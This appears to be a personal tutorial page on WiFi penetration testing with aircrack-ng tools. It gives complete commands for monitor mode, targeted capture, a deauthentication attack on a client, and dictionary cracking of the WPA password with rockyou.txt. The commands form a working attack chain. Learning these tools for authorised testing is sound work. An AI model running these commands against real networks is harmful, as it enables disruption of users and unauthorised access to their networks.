Skip to main content

Pentesting wifi networks

Put your wifi interface in monitor mode to capture not only the WiFi traffic routed to the device, but all the traffic that is transmitted over the air.

Enable monitor mode

  1. Check if you have processes that will interfere with monitor mode:
└─$ sudo airmon-ng check                                                    
[sudo] password for gal: 

Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    817 avahi-daemon
    839 avahi-daemon
    891 NetworkManager
    963 wpa_supplicant
  1. Kill them
┌──(gal㉿gal)-[~/workspace/gal/docs]
└─$ sudo airmon-ng check kill

Killing these processes:

    PID Name
    963 wpa_supplicant
  1. Start monitor mode
└─$ sudo airmon-ng start wlan0  


PHY     Interface       Driver          Chipset

phy0    wlan0           iwlwifi         Intel Corporation Alder Lake-P PCH CNVi WiFi (rev 01)
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Now wlan0 might change to wlan0mon

Capture the traffic

  1. Start checking what's around:
sudo airodump-ng wlan0mon
  1. Once you have found a target, specify the channel and the bssid:
sudo airodump-ng --bssid 66:8B:92:F9:A2:9A  -w /tmp/guifiwc wlan0mon -c 11

This will store the traffic in the specified files with -w. Once you find an station connected to the bssid, you can start a de-auth attack.

Deauth attack

The deauth attack will send packets to the WiFi client to force a de-authentication and a later authentication within the network. This will produce a bunch of auth messages signed with the hash of the WiFi password, which later we'll try to bruteforce with a dictionary attack.

sudo aireplay-ng -0 2 -c FA:50:A4:49:2F:AA -a 66:8B:92:F9:A2:9A wlan0mon

-0 means deauth and 2 is the number of deauth packets to send -c is the client MAC address -a is the station BSSID.

Once this is done successfully, airodump will show a bunch of received data.

Crack the password

Now pass the capture to aircrack-ng to bruteforce the password using a dictionary:

aircrack-ng -a2 -b 66:8B:92:F9:A2:9A -w /usr/share/wordlists/rockyou.txt /tmp/guifiwc-02.cap

Revert to normal mode

Stop airmin-ng:

└─$ sudo airmon-ng stop wlan0mon

PHY     Interface       Driver          Chipset

phy0    wlan0mon        iwlwifi         Intel Corporation Alder Lake-P PCH CNVi WiFi (rev 01)
                (mac80211 station mode vif enabled on [phy0]wlan0)
                (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

You might need to start NetworkManager or similar:

sudo NetworkManager

More: https://github.com/ricardojoserf/wifi-pentesting-guide?tab=readme-ov-file#4